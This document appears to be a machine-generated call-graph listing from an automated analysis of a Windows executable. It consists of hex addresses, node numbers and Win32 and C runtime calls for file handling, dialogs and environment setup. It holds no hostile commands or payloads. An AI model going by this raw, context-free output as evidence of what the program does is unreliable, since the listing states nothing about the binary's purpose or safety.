ShowWindow 24037->23969 24039 7dc749 __EH_prolog 24038->24039 24040 7dbdcf 24039->24040 24246 7db314 24039->24246 24040->23980 24043 7db314 ExpandEnvironmentStringsW 24052 7dc780 _wcslen _wcsrchr 24043->24052 24044 7dca67 SetWindowTextW 24044->24052 24049 7dc855 SetFileAttributesW 24051 7dc90f GetFileAttributesW 24049->24051 24062 7dc86f _abort _wcslen 24049->24062 24051->24052 24054 7dc921 DeleteFileW 24051->24054 24052->24040 24052->24043 24052->24044 24052->24049 24055 7dcc31 GetDlgItem SetWindowTextW SendMessageW 24052->24055 24058 7dcc71 SendMessageW 24052->24058 24250 7d1fbb CompareStringW 24052->24250 24251 7da64d GetCurrentDirectoryW 24052->24251 24253 7ca5d1 6 API calls 24052->24253 24254 7ca55a FindClose 24052->24254 24255 7db48e 76 API calls 2 library calls 24052->24255 24256 7e3e3e 24052->24256 24054->24052 24056 7dc932 24054->24056 24055->24052 24057 7c4092 _swprintf 51 API calls 24056->24057 24059 7dc952 GetFileAttributesW 24057->24059 24058->24052 24059->24056 24060 7dc967 MoveFileW 24059->24060 24060->24052 24061 7dc97f MoveFileExW 24060->24061 24061->24052 24062->24051 24062->24052 24252 7cb991 51 API calls 3 library calls 24062->24252 24064 7dda5c __EH_prolog 24063->24064 24271 7d0659 24064->24271 24066 7dda8d 24275 7c5b3d 24066->24275 24068 7ddaab 24279 7c7b0d 24068->24279 24072 7ddafe 24295 7c7b9e 24072->24295 24074 7dbdee 24074->23989 24076 7dd6a8 24075->24076 24801 7da5c6 24076->24801 24079 7dd6b5 GetWindow 24080 7dbf15 24079->24080 24083 7dd6d5 24079->24083 24080->23842 24080->23843 24081 7dd6e2 GetClassNameW 24806 7d1fbb CompareStringW 24081->24806 24083->24080 24083->24081 24084 7dd76a GetWindow 24083->24084 24085 7dd706 GetWindowLongW 24083->24085 24084->24080 24084->24083 24085->24084 24086 7dd716 SendMessageW 24085->24086 24086->24084 24087 7dd72c GetObjectW 24086->24087 24807 7da605 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24087->24807 24089 7dd743 24808 7da5e4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24089->24808 24809 7da80c 8 API calls 24089->24809 24092 7dd754 SendMessageW DeleteObject 24092->24084 24093->23857 24095 7dabcc 24094->24095 24097 7dabf1 24094->24097 24812 7d1fbb CompareStringW 24095->24812 24100 7db093 24097->24100 24098 7dabdf 24098->24097 24099 7dabe3 FindWindowExW 24098->24099 24099->24097 24101 7db09d __EH_prolog 24100->24101 24102 7c13dc 84 API calls 24101->24102 24103 7db0bf 24102->24103 24813 7c1fdc 24103->24813 24106 7db0d9 24108 7c1692 86 API calls 24106->24108 24107 7db0eb 24109 7c19af 128 API calls 24107->24109 24110 7db0e4 24108->24110 24112 7db10d __InternalCxxFrameHandler ___std_exception_copy 24109->24112 24110->23884 24110->23888 24111 7c1692 86 API calls 24111->24110 24112->24111 24113->23931 24821 7db568 PeekMessageW 24114->24821 24117 7dd536 SendMessageW SendMessageW 24119 7dd591 SendMessageW SendMessageW SendMessageW 24117->24119 24120 7dd572 24117->24120 24118 7dd502 24121 7dd50d ShowWindow SendMessageW SendMessageW 24118->24121 24122 7dd5c4 SendMessageW 24119->24122 24123 7dd5e7 SendMessageW 24119->24123 24120->24119 24121->24117 24122->24123 24123->23886 24124->23945 24125->23971 24126->23977 24127->23981 24128->23986 24129->23853 24130->23921 24131->23946 24132->23917 24133->23906 24134->24002 24135->23999 24137 7ca2bf 24136->24137 24138 7ca2e3 24137->24138 24139 7ca2d6 CreateDirectoryW 24137->24139 24157 7ca231 24138->24157 24139->24138 24141 7ca316 24139->24141 24144 7ca325 24141->24144 24149 7ca4ed 24141->24149 24143 7ca329 GetLastError 24143->24144 24144->24009 24147 7ca2ff 24147->24143 24148 7ca303 CreateDirectoryW 24147->24148 24148->24141 24148->24143 24164 7dec50 24149->24164 24152 7ca53d 24152->24144 24153 7ca510 24154 7cbb03 GetCurrentDirectoryW 24153->24154 24155 7ca524 24154->24155 24155->24152 24156 7ca528 SetFileAttributesW 24155->24156 24156->24152 24166 7ca243 24157->24166 24160 7cbb03 24161 7cbb10 _wcslen 24160->24161 24162 7cbbb8 GetCurrentDirectoryW 24161->24162 24163 7cbb39 _wcslen 24161->24163 24162->24163 24163->24147 24165 7ca4fa SetFileAttributesW 24164->24165 24165->24152 24165->24153 24167 7dec50 24166->24167 24168 7ca250 GetFileAttributesW 24167->24168 24169 7ca23a 24168->24169 24170 7ca261 24168->24170 24169->24143 24169->24160 24171 7cbb03 GetCurrentDirectoryW 24170->24171 24172 7ca275 24171->24172 24172->24169 24173 7ca279 GetFileAttributesW 24172->24173 24173->24169 24175 7c407c __vswprintf_c_l 24174->24175 24178 7e5fd4 24175->24178 24181 7e4097 24178->24181 24182 7e40bf 24181->24182 24183 7e40d7 24181->24183 24198 7e91a8 20 API calls _abort 24182->24198 24183->24182 24184 7e40df 24183->24184 24186 7e4636 __fassign 38 API calls 24184->24186 24189 7e40ef 24186->24189 24187 7e40c4 24199 7e9087 26 API calls ___std_exception_copy 24187->24199 24200 7e4601 20 API calls 2 library calls 24189->24200 24190 7e40cf 24191 7dfbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 24190->24191 24193 7c4086 24191->24193 24193->23941 24194 7e4167 24201 7e49e6 51 API calls 3 library calls 24194->24201 24197 7e4172 24202 7e46b9 20 API calls _free 24197->24202 24198->24187 24199->24190 24200->24194 24201->24197 24202->24190 24204 7c9757 24203->24204 24205 7c9781 24203->24205 24204->24205 24214 7ca1e0 24204->24214 24205->24026 24209 7c962c 24208->24209 24212 7c964a 24208->24212 24211 7c9638 FindCloseChangeNotification 24209->24211 24209->24212 24210 7c9669 24210->24026 24211->24212 24212->24210 24222 7c6bd5 76 API calls 24212->24222 24215 7dec50 24214->24215 24216 7ca1ed DeleteFileW 24215->24216 24217 7c977f 24216->24217 24218 7ca200 24216->24218 24217->24026 24219 7cbb03 GetCurrentDirectoryW 24218->24219 24220 7ca214 24219->24220 24220->24217 24221 7ca218 DeleteFileW 24220->24221 24221->24217 24222->24210 24229 7cd9b0 24223->24229 24226 7ce66b LoadStringW 24227 7ce645 SetDlgItemTextW 24226->24227 24228 7ce682 LoadStringW 24226->24228 24227->24037 24228->24227 24234 7cd8ec 24229->24234 24231 7cd9cd 24232 7cd9e2 24231->24232 24242 7cd9f0 26 API calls 24231->24242 24232->24226 24232->24227 24235 7cd904 24234->24235 24241 7cd984 _strncpy 24234->24241 24237 7cd928 24235->24237 24243 7d1da7 WideCharToMultiByte 24235->24243 24240 7cd959 24237->24240 24244 7ce5b1 50 API calls __vsnprintf 24237->24244 24245 7e6159 26 API calls 3 library calls 24240->24245 24241->24231 24242->24232 24243->24237 24244->24240 24245->24241 24247 7db31e 24246->24247 24248 7db3f0 ExpandEnvironmentStringsW 24247->24248 24249 7db40d 24247->24249 24248->24249 24249->24052 24250->24052 24251->24052 24252->24062 24253->24052 24254->24052 24255->24052 24257 7e8e54 24256->24257 24258 7e8e6c 24257->24258 24259 7e8e61 24257->24259 24261 7e8e74 24258->24261 24267 7e8e7d _abort 24258->24267 24260 7e8e06 __vsnwprintf_l 21 API calls 24259->24260 24264 7e8e69 24260->24264 24265 7e8dcc _free 20 API calls 24261->24265 24262 7e8ea7 HeapReAlloc 24262->24264 24262->24267 24263 7e8e82 24269 7e91a8 20 API calls _abort 24263->24269 24264->24052 24265->24264 24267->24262 24267->24263 24270 7e7a5e 7 API calls 2 library calls 24267->24270 24269->24264 24270->24267 24272 7d0666 _wcslen 24271->24272 24299 7c17e9 24272->24299 24274 7d067e 24274->24066 24276 7d0659 _wcslen 24275->24276 24277 7c17e9 78 API calls 24276->24277 24278 7d067e 24277->24278 24278->24068 24280 7c7b17 __EH_prolog 24279->24280 24316 7cce40 24280->24316 24282 7c7b32 24322 7deb38 24282->24322 24284 7c7b5c 24331 7d4a76 24284->24331 24287 7c7c7d 24288 7c7c87 24287->24288 24290 7c7cf1 24288->24290 24363 7ca56d 24288->24363 24292 7c7d50 24290->24292 24341 7c8284 24290->24341 24294 7c7d92 24292->24294 24369 7c138b 74 API calls 24292->24369 24294->24072 24296 7c7bac 24295->24296 24298 7c7bb3 24295->24298 24297 7d2297 86 API calls 24296->24297 24297->24298 24300 7c17ff 24299->24300 24301 7c185a __InternalCxxFrameHandler 24299->24301 24302 7c1828 24300->24302 24312 7c6c36 76 API calls __vswprintf_c_l 24300->24312 24301->24274 24304 7c1887 24302->24304 24309 7c1847 ___std_exception_copy 24302->24309 24306 7e3e3e 22 API calls 24304->24306 24305 7c181e 24313 7c6ca7 75 API calls 24305->24313 24308 7c188e 24306->24308 24308->24301 24315 7c6ca7 75 API calls 24308->24315 24309->24301 24314 7c6ca7 75 API calls 24309->24314 24312->24305 24313->24302 24314->24301 24315->24301 24317 7cce4a __EH_prolog 24316->24317 24318 7deb38 8 API calls 24317->24318 24319 7cce8d 24318->24319 24320 7deb38 8 API calls 24319->24320 24321 7cceb1 24320->24321 24321->24282 24323 7deb3d ___std_exception_copy 24322->24323 24324 7deb57 24323->24324 24327 7deb59 24323->24327 24337 7e7a5e 7 API calls 2 library calls 24323->24337 24324->24284 24326 7df5c9 24339 7e238d RaiseException 24326->24339 24327->24326 24338 7e238d RaiseException 24327->24338 24330 7df5e6 24332 7d4a80 __EH_prolog 24331->24332 24333 7deb38 8 API calls 24332->24333 24334 7d4a9c 24333->24334 24335 7c7b8b 24334->24335 24340 7d0e46 80 API calls 24334->24340 24335->24287 24337->24323 24338->24326 24339->24330 24340->24335 24342 7c828e __EH_prolog 24341->24342 24370 7c13dc 24342->24370 24344 7c82aa 24345 7c82bb 24344->24345 24513 7c9f42 24344->24513 24350 7c82f2 24345->24350 24378 7c1a04 24345->24378 24509 7c1692 24350->24509 24351 7c8389 24397 7c8430 24351->24397 24355 7c83e8 24405 7c1f6d 24355->24405 24358 7c83f3 24358->24350 24409 7c3b2d 24358->24409 24421 7c848e 24358->24421 24360 7ca56d 7 API calls 24361 7c82ee 24360->24361 24361->24350 24361->24351 24361->24360 24517 7cc0c5 CompareStringW _wcslen 24361->24517 24364 7ca582 24363->24364 24368 7ca5b0 24364->24368 24790 7ca69b 24364->24790 24366 7ca592 24367 7ca597 FindClose 24366->24367 24366->24368 24367->24368 24368->24288 24369->24294 24371 7c13e1 __EH_prolog 24370->24371 24372 7cce40 8 API calls 24371->24372 24373 7c1419 24372->24373 24374 7deb38 8 API calls 24373->24374 24377 7c1474 _abort 24373->24377 24375 7c1461 24374->24375 24375->24377 24518 7cb505 24375->24518 24377->24344 24379 7c1a0e __EH_prolog 24378->24379 24391 7c1a61 24379->24391 24393 7c1b9b 24379->24393 24534 7c13ba 24379->24534 24381 7c1bc7 24537 7c138b 74 API calls 24381->24537 24384 7c3b2d 101 API calls 24388 7c1c12 24384->24388 24385 7c1bd4 24385->24384 24385->24393 24386 7c1c5a 24390 7c1c8d 24386->24390 24386->24393 24538 7c138b 74 API calls 24386->24538 24388->24386 24389 7c3b2d 101 API calls 24388->24389 24389->24388 24390->24393 24395 7c9e80 79 API calls 24390->24395 24391->24381 24391->24385 24391->24393 24392 7c3b2d 101 API calls 24394 7c1cde 24392->24394 24393->24361 24394->24392 24394->24393 24395->24394 24396 7c9e80 79 API calls 24396->24391 24556 7ccf3d 24397->24556 24399 7c8440 24560 7d13d2 GetSystemTime SystemTimeToFileTime 24399->24560 24401 7c83a3 24401->24355 24402 7d1b66 24401->24402 24561 7dde6b 24402->24561 24406 7c1f72 __EH_prolog 24405->24406 24408 7c1fa6 24406->24408 24569 7c19af 24406->24569 24408->24358 24410 7c3b3d 24409->24410 24411 7c3b39 24409->24411 24420 7c9e80 79 API calls 24410->24420 24411->24358 24412 7c3b4f 24413 7c3b78 24412->24413 24414 7c3b6a 24412->24414 24725 7c286b 101 API calls 3 library calls 24413->24725 24416 7c3baa 24414->24416 24724 7c32f7 89 API calls 2 library calls 24414->24724 24416->24358 24418 7c3b76 24418->24416 24726 7c20d7 74 API calls 24418->24726 24420->24412 24422 7c8498 __EH_prolog 24421->24422 24425 7c84d5 24422->24425 24436 7c8513 24422->24436 24751 7d8c8d 103 API calls 24422->24751 24424 7c84f5 24426 7c851c 24424->24426 24427 7c84fa 24424->24427 24425->24424 24430 7c857a 24425->24430 24425->24436 24426->24436 24753 7d8c8d 103 API calls 24426->24753 24427->24436 24752 7c7a0d 152 API calls 24427->24752 24430->24436 24727 7c5d1a 24430->24727 24432 7c8605 24432->24436 24733 7c8167 24432->24733 24435 7c8797 24437 7ca56d 7 API calls 24435->24437 24438 7c8802 24435->24438 24436->24358 24437->24438 24739 7c7c0d 24438->24739 24440 7cd051 82 API calls 24446 7c885d 24440->24446 24441 7c8992 24442 7c8a5f 24441->24442 24449 7c89e1 24441->24449 24447 7c8ab6 24442->24447 24460 7c8a6a 24442->24460 24443 7c898b 24756 7c2021 74 API calls 24443->24756 24446->24436 24446->24440 24446->24441 24446->24443 24754 7c8117 84 API calls 24446->24754 24755 7c2021 74 API calls 24446->24755 24452 7c8a4c 24447->24452 24759 7c7fc0 97 API calls 24447->24759 24448 7c8ab4 24453 7c959a 80 API calls 24448->24453 24449->24452 24454 7ca231 3 API calls 24449->24454 24457 7c8b14 24449->24457 24450 7c9105 24451 7c959a 80 API calls 24450->24451 24451->24436 24452->24448 24452->24457 24453->24436 24456 7c8a19 24454->24456 24456->24452 24757 7c92a3 97 API calls 24456->24757 24457->24450 24469 7c8b82 24457->24469 24760 7c98bc 24457->24760 24458 7cab1a 8 API calls 24461 7c8bd1 24458->24461 24460->24448 24758 7c7db2 101 API calls 24460->24758 24464 7cab1a 8 API calls 24461->24464 24479 7c8be7 24464->24479 24467 7c8b70 24764 7c6e98 77 API calls 24467->24764 24469->24458 24470 7c8cbc 24471 7c8d18 24470->24471 24472 7c8e40 24470->24472 24473 7c8d8a 24471->24473 24476 7c8d28 24471->24476 24474 7c8e66 24472->24474 24475 7c8e52 24472->24475 24495 7c8d49 24472->24495 24483 7c8167 19 API calls 24473->24483 24478 7d3377 75 API calls 24474->24478 24477 7c9215 123 API calls 24475->24477 24480 7c8d6e 24476->24480 24487 7c8d37 24476->24487 24477->24495 24481 7c8e7f 24478->24481 24479->24470 24482 7c8c93 24479->24482 24489 7c981a 79 API calls 24479->24489 24480->24495 24767 7c77b8 111 API calls 24480->24767 24484 7d3020 123 API calls 24481->24484 24482->24470 24765 7c9a3c 82 API calls 24482->24765 24486 7c8dbd 24483->24486 24484->24495 24491 7c8df5 24486->24491 24492 7c8de6 24486->24492 24486->24495 24766 7c2021 74 API calls 24487->24766 24489->24482 24769 7c9155 93 API calls __EH_prolog 24491->24769 24768 7c7542 85 API calls 24492->24768 24500 7c8f85 24495->24500 24770 7c2021 74 API calls 24495->24770 24497 7c9090 24497->24450 24498 7ca4ed 3 API calls 24497->24498 24501 7c90eb 24498->24501 24499 7c903e 24746 7c9da2 24499->24746 24500->24450 24500->24497 24500->24499 24745 7c9f09 SetEndOfFile 24500->24745 24501->24450 24771 7c2021 74 API calls 24501->24771 24504 7c9085 24505 7c9620 77 API calls 24504->24505 24505->24497 24507 7c90fb 24772 7c6dcb 76 API calls _wcschr 24507->24772 24510 7c16a4 24509->24510 24788 7ccee1 86 API calls 24510->24788 24514 7c9f59 24513->24514 24515 7c9f63 24514->24515 24789 7c6d0c 78 API calls 24514->24789 24515->24345 24517->24361 24519 7cb50f __EH_prolog 24518->24519 24524 7cf1d0 82 API calls 24519->24524 24521 7cb521 24525 7cb61e 24521->24525 24524->24521 24526 7cb630 _abort 24525->24526 24529 7d10dc 24526->24529 24532 7d109e GetCurrentProcess GetProcessAffinityMask 24529->24532 24533 7cb597 24532->24533 24533->24377 24539 7c1732 24534->24539 24536 7c13d6 24536->24396 24537->24393 24538->24390 24540 7c1748 24539->24540 24551 7c17a0 __InternalCxxFrameHandler 24539->24551 24541 7c1771 24540->24541 24552 7c6c36 76 API calls __vswprintf_c_l 24540->24552 24543 7c17c7 24541->24543 24547 7c178d ___std_exception_copy 24541->24547 24545 7e3e3e 22 API calls 24543->24545 24544 7c1767 24553 7c6ca7 75 API calls 24544->24553 24548 7c17ce 24545->24548 24547->24551 24554 7c6ca7 75 API calls 24547->24554 24548->24551 24555 7c6ca7 75 API calls 24548->24555 24551->24536 24552->24544 24553->24541 24554->24551 24555->24551 24557 7ccf4d 24556->24557 24559 7ccf54 24556->24559 24558 7c981a 79 API calls 24557->24558 24558->24559 24559->24399 24560->24401 24562 7dde78 24561->24562 24563 7ce617 53 API calls 24562->24563 24564 7dde9b 24563->24564 24565 7c4092 _swprintf 51 API calls 24564->24565 24566 7ddead 24565->24566 24567 7dd4d4 16 API calls 24566->24567 24568 7d1b7c 24567->24568 24568->24355 24570 7c19bf 24569->24570 24573 7c19bb 24569->24573 24574 7c9e80 79 API calls 24570->24574 24571 7c19d4 24575 7c18f6 24571->24575 24573->24408 24574->24571 24576 7c1908 24575->24576 24577 7c1945 24575->24577 24578 7c3b2d 101 API calls 24576->24578 24583 7c3fa3 24577->24583 24580 7c1928 24578->24580 24580->24573 24587 7c3fac 24583->24587 24584 7c3b2d 101 API calls 24584->24587 24585 7c1966 24585->24580 24588 7c1e50 24585->24588 24587->24584 24587->24585 24600 7d0e08 24587->24600 24589 7c1e5a __EH_prolog 24588->24589 24608 7c3bba 24589->24608 24591 7c1e84 24592 7c1732 78 API calls 24591->24592 24594 7c1f0b 24591->24594 24593 7c1e9b 24592->24593 24636 7c18a9 78 API calls 24593->24636 24594->24580 24596 7c1eb3 24598 7c1ebf _wcslen 24596->24598 24637 7d1b84 MultiByteToWideChar 24596->24637 24638 7c18a9 78 API calls 24598->24638 24601 7d0e0f 24600->24601 24604 7d0e2a 24601->24604 24606 7c6c31 RaiseException _com_raise_error 24601->24606 24603 7d0e3b SetThreadExecutionState 24603->24587 24604->24603 24607 7c6c31 RaiseException _com_raise_error 24604->24607 24606->24604 24607->24603 24609 7c3bc4 __EH_prolog 24608->24609 24610 7c3bda 24609->24610 24611 7c3bf6 24609->24611 24664 7c138b 74 API calls 24610->24664 24612 7c3e51 24611->24612 24616 7c3c22 24611->24616 24689 7c138b 74 API calls 24612->24689 24615 7c3be5 24615->24591 24616->24615 24639 7d3377 24616->24639 24618 7c3ca3 24619 7c3d2e 24618->24619 24635 7c3c9a 24618->24635 24667 7cd051 24618->24667 24649 7cab1a 24619->24649 24620 7c3c9f 24620->24618 24666 7c20bd 78 API calls 24620->24666 24621 7c3c8f 24665 7c138b 74 API calls 24621->24665 24622 7c3c71 24622->24618 24622->24620 24622->24621 24624 7c3d41 24629 7c3dd7 24624->24629 24630 7c3dc7 24624->24630 24673 7d3020 24629->24673 24653 7c9215 24630->24653 24633 7c3dd5 24633->24635 24682 7c2021 74 API calls 24633->24682 24683 7d2297 24635->24683 24636->24596 24637->24598 24638->24594 24640 7d338c 24639->24640 24642 7d3396 ___std_exception_copy 24639->24642 24690 7c6ca7 75 API calls 24640->24690 24643 7d34c6 24642->24643 24644 7d341c 24642->24644 24648 7d3440 _abort 24642->24648 24692 7e238d RaiseException 24643->24692 24691 7d32aa 75 API calls 3 library calls 24644->24691 24647 7d34f2 24648->24622 24650 7cab28 24649->24650 24652 7cab32 24649->24652 24651 7deb38 8 API calls 24650->24651 24651->24652 24652->24624 24654 7c921f __EH_prolog 24653->24654 24693 7c7c64 24654->24693 24657 7c13ba 78 API calls 24658 7c9231 24657->24658 24696 7cd114 24658->24696 24660 7c928a 24660->24633 24662 7cd114 118 API calls 24663 7c9243 24662->24663 24663->24660 24663->24662 24705 7cd300 97 API calls __InternalCxxFrameHandler 24663->24705 24664->24615 24665->24635 24666->24618 24668 7cd084 24667->24668 24669 7cd072 24667->24669 24707 7c603a 82 API calls 24668->24707 24706 7c603a 82 API calls 24669->24706 24672 7cd07c 24672->24619 24674 7d3052 24673->24674 24677 7d3029 24673->24677 24681 7d3046 24674->24681 24722 7d552f 123 API calls 2 library calls 24674->24722 24676 7d3048 24721 7d624a 118 API calls 24676->24721 24677->24676 24678 7d303e 24677->24678 24677->24681 24708 7d6cdc 24678->24708 24681->24633 24682->24635 24685 7d22a1 24683->24685 24684 7d22ba 24723 7d0eed 86 API calls 24684->24723 24685->24684 24688 7d22ce 24685->24688 24687 7d22c1 24687->24688 24689->24615 24690->24642 24691->24648 24692->24647 24694 7cb146 GetVersionExW 24693->24694 24695 7c7c69 24694->24695 24695->24657 24702 7cd12a __InternalCxxFrameHandler 24696->24702 24697 7cd29a 24698 7cd2ce 24697->24698 24699 7cd0cb 6 API calls 24697->24699 24700 7d0e08 SetThreadExecutionState RaiseException 24698->24700 24699->24698 24703 7cd291 24700->24703 24701 7d8c8d 103 API calls 24701->24702 24702->24697 24702->24701 24702->24703 24704 7cac05 91 API calls 24702->24704 24703->24663 24704->24702 24705->24663 24706->24672 24707->24672 24709 7d359e 75 API calls 24708->24709 24710 7d6ced __InternalCxxFrameHandler 24709->24710 24711 7cd114 118 API calls 24710->24711 24712 7d70fe 24710->24712 24715 7d11cf 81 API calls 24710->24715 24716 7d3e0b 118 API calls 24710->24716 24717 7d7153 118 API calls 24710->24717 24718 7d0f86 88 API calls 24710->24718 24719 7d390d 98 API calls 24710->24719 24720 7d77ef 123 API calls 24710->24720 24711->24710 24713 7d5202 98 API calls 24712->24713 24714 7d710e __InternalCxxFrameHandler 24713->24714 24714->24681 24715->24710 24716->24710 24717->24710 24718->24710 24719->24710 24720->24710 24721->24681 24722->24681 24723->24687 24724->24418 24725->24418 24726->24416 24728 7c5d2a 24727->24728 24773 7c5c4b 24728->24773 24730 7c5d5d 24732 7c5d95 24730->24732 24778 7cb1dc CharUpperW CompareStringW _wcslen ___vcrt_FlsFree 24730->24778 24732->24432 24734 7c8186 24733->24734 24735 7c8232 24734->24735 24785 7cbe5e 19 API calls __InternalCxxFrameHandler 24734->24785 24784 7d1fac CharUpperW 24735->24784 24738 7c823b 24738->24435 24740 7c7c22 24739->24740 24741 7c7c5a 24740->24741 24786 7c6e7a 74 API calls 24740->24786 24741->24446 24743 7c7c52 24787 7c138b 74 API calls 24743->24787 24745->24499 24747 7c9db3 24746->24747 24750 7c9dc2 24746->24750 24748 7c9db9 FlushFileBuffers 24747->24748 24747->24750 24748->24750 24749 7c9e3f SetFileTime 24749->24504 24750->24749 24751->24425 24752->24436 24753->24436 24754->24446 24755->24446 24756->24441 24757->24452 24758->24448 24759->24452 24761 7c98c5 GetFileType 24760->24761 24762 7c8b5a 24760->24762 24761->24762 24762->24469 24763 7c2021 74 API calls 24762->24763 24763->24467 24764->24469 24765->24470 24766->24495 24767->24495 24768->24495 24769->24495 24770->24500 24771->24507 24772->24450 24779 7c5b48 24773->24779 24775 7c5c6c 24775->24730 24777 7c5b48 2 API calls 24777->24775 24778->24730 24781 7c5b52 24779->24781 24780 7c5c3a 24780->24775 24780->24777 24781->24780 24783 7cb1dc CharUpperW CompareStringW _wcslen ___vcrt_FlsFree 24781->24783 24783->24781 24784->24738 24785->24735 24786->24743 24787->24741 24789->24515 24791 7ca6a8 24790->24791 24792 7ca727 FindNextFileW 24791->24792 24793 7ca6c1 FindFirstFileW 24791->24793 24794 7ca732 GetLastError 24792->24794 24798 7ca709 24792->24798 24795 7ca6d0 24793->24795 24793->24798 24794->24798 24796 7cbb03 GetCurrentDirectoryW 24795->24796 24797 7ca6e0 24796->24797 24799 7ca6fe GetLastError 24797->24799 24800 7ca6e4 FindFirstFileW 24797->24800 24798->24366 24799->24798 24800->24798 24800->24799 24810 7da5e4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24801->24810 24803 7da5cd 24805 7da5d9 24803->24805 24811 7da605 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24803->24811 24805->24079 24805->24080 24806->24083 24807->24089 24808->24089 24809->24092 24810->24803 24811->24805 24812->24098 24814 7c9f42 78 API calls 24813->24814 24815 7c1fe8 24814->24815 24816 7c1a04 101 API calls 24815->24816 24819 7c2005 24815->24819 24817 7c1ff5 24816->24817 24817->24819 24820 7c138b 74 API calls 24817->24820 24819->24106 24819->24107 24820->24819 24822 7db5bc GetDlgItem 24821->24822 24823 7db583 GetMessageW 24821->24823 24822->24117 24822->24118 24824 7db599 IsDialogMessageW 24823->24824 24825 7db5a8 TranslateMessage DispatchMessageW 24823->24825 24824->24822 24824->24825 24825->24822 24826 7c13e1 84 API calls 2 library calls 25429 7d94e0 GetClientRect 25430 7df2e0 46 API calls __RTC_Initialize 25475 7d21e0 26 API calls std::bad_exception::bad_exception 25431 7ebee0 GetCommandLineA GetCommandLineW 25432 7e0ada 51 API calls 2 library calls 24889 7c10d5 24894 7c5abd 24889->24894 24895 7c5ac7 __EH_prolog 24894->24895 24896 7cb505 84 API calls 24895->24896 24897 7c5ad3 24896->24897 24901 7c5cac GetCurrentProcess GetProcessAffinityMask 24897->24901 24902 7de2d7 24904 7de1db 24902->24904 24903 7de85d ___delayLoadHelper2@8 14 API calls 24903->24904 24904->24903 24905 7de1d1 14 API calls ___delayLoadHelper2@8 25433 7df4d3 20 API calls 25477 7ea3d0 21 API calls 2 library calls 25478 7f2bd0 VariantClear 25437 7d62ca 123 API calls __InternalCxxFrameHandler 25480 7db5c0 100 API calls 25481 7d77c0 118 API calls 25482 7dffc0 RaiseException _com_raise_error _com_error::_com_error 24916 7ddec2 24917 7ddecf 24916->24917 24918 7ce617 53 API calls 24917->24918 24919 7ddedc 24918->24919 24920 7c4092 _swprintf 51 API calls 24919->24920 24921 7ddef1 SetDlgItemTextW 24920->24921 24922 7db568 5 API calls 24921->24922 24923 7ddf0e 24922->24923 25483 7d1bbd GetCPInfo IsDBCSLeadByte 25484 7eb1b8 27 API calls 2 library calls 25485 7db1b0 GetDlgItem EnableWindow ShowWindow SendMessageW 24933 7df3b2 24934 7df3be __FrameHandler3::FrameUnwindToState 24933->24934 24965 7deed7 24934->24965 24936 7df3c5 24937 7df518 24936->24937 24940 7df3ef 24936->24940 25038 7df838 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter _abort 24937->25038 24939 7df51f 25031 7e7f58 24939->25031 24951 7df42e ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 24940->24951 24976 7e8aed 24940->24976 24947 7df40e 24949 7df48f 24984 7df953 GetStartupInfoW _abort 24949->24984 24951->24949 25034 7e7af4 38 API calls _abort 24951->25034 24952 7df495 24985 7e8a3e 51 API calls 24952->24985 24955 7df49d 24986 7ddf1e 24955->24986 24959 7df4b1 24959->24939 24960 7df4b5 24959->24960 24961 7df4be 24960->24961 25036 7e7efb 28 API calls _abort 24960->25036 25037 7df048 12 API calls ___scrt_uninitialize_crt 24961->25037 24964 7df4c6 24964->24947 24966 7deee0 24965->24966 25040 7df654 IsProcessorFeaturePresent 24966->25040 24968 7deeec 25041 7e2a5e 24968->25041 24970 7deef1 24975 7deef5 24970->24975 25049 7e8977 24970->25049 24973 7def0c 24973->24936 24975->24936 24977 7e8b04 24976->24977 24978 7dfbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 24977->24978 24979 7df408 24978->24979 24979->24947 24980 7e8a91 24979->24980 24981 7e8ac0 24980->24981 24982 7dfbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 24981->24982 24983 7e8ae9 24982->24983 24983->24951 24984->24952 24985->24955 25100 7d0863 24986->25100 24990 7ddf3d 25149 7dac16 24990->25149 24992 7ddf46 _abort 24993 7ddf59 GetCommandLineW 24992->24993 24994 7ddf68 24993->24994 24995 7ddfe6 GetModuleFileNameW SetEnvironmentVariableW GetLocalTime 24993->24995 25153 7dc5c4 24994->25153 24996 7c4092 _swprintf 51 API calls 24995->24996 24998 7de04d SetEnvironmentVariableW GetModuleHandleW LoadIconW 24996->24998 25164 7db6dd LoadBitmapW 24998->25164 25001 7ddf76 OpenFileMappingW 25005 7ddf8f MapViewOfFile 25001->25005 25006 7ddfd6 CloseHandle 25001->25006 25002 7ddfe0 25158 7ddbde 25002->25158 25008 7ddfcd UnmapViewOfFile 25005->25008 25009 7ddfa0 __InternalCxxFrameHandler 25005->25009 25006->24995 25008->25006 25013 7ddbde 2 API calls 25009->25013 25015 7ddfbc 25013->25015 25014 7d90b7 8 API calls 25016 7de0aa DialogBoxParamW 25014->25016 25015->25008 25017 7de0e4 25016->25017 25018 7de0fd 25017->25018 25019 7de0f6 Sleep 25017->25019 25021 7de10b 25018->25021 25194 7dae2f CompareStringW SetCurrentDirectoryW _abort _wcslen 25018->25194 25019->25018 25022 7de12a DeleteObject 25021->25022 25023 7de13f DeleteObject 25022->25023 25024 7de146 25022->25024 25023->25024 25025 7de189 25024->25025 25026 7de177 25024->25026 25191 7dac7c 25025->25191 25195 7ddc3b 6 API calls 25026->25195 25029 7de17d CloseHandle 25029->25025 25030 7de1c3 25035 7df993 GetModuleHandleW 25030->25035 25325 7e7cd5 25031->25325 25034->24949 25035->24959 25036->24961 25037->24964 25038->24939 25040->24968 25053 7e3b07 25041->25053 25045 7e2a7a 25045->24970 25046 7e2a6f 25046->25045 25067 7e3b43 DeleteCriticalSection 25046->25067 25048 7e2a67 25048->24970 25096 7ec05a 25049->25096 25052 7e2a7d 7 API calls 2 library calls 25052->24975 25054 7e3b10 25053->25054 25056 7e3b39 25054->25056 25057 7e2a63 25054->25057 25068 7e3d46 25054->25068 25073 7e3b43 DeleteCriticalSection 25056->25073 25057->25048 25059 7e2b8c 25057->25059 25089 7e3c57 25059->25089 25062 7e2ba1 25062->25046 25064 7e2baf 25065 7e2bbc 25064->25065 25095 7e2bbf 6 API calls 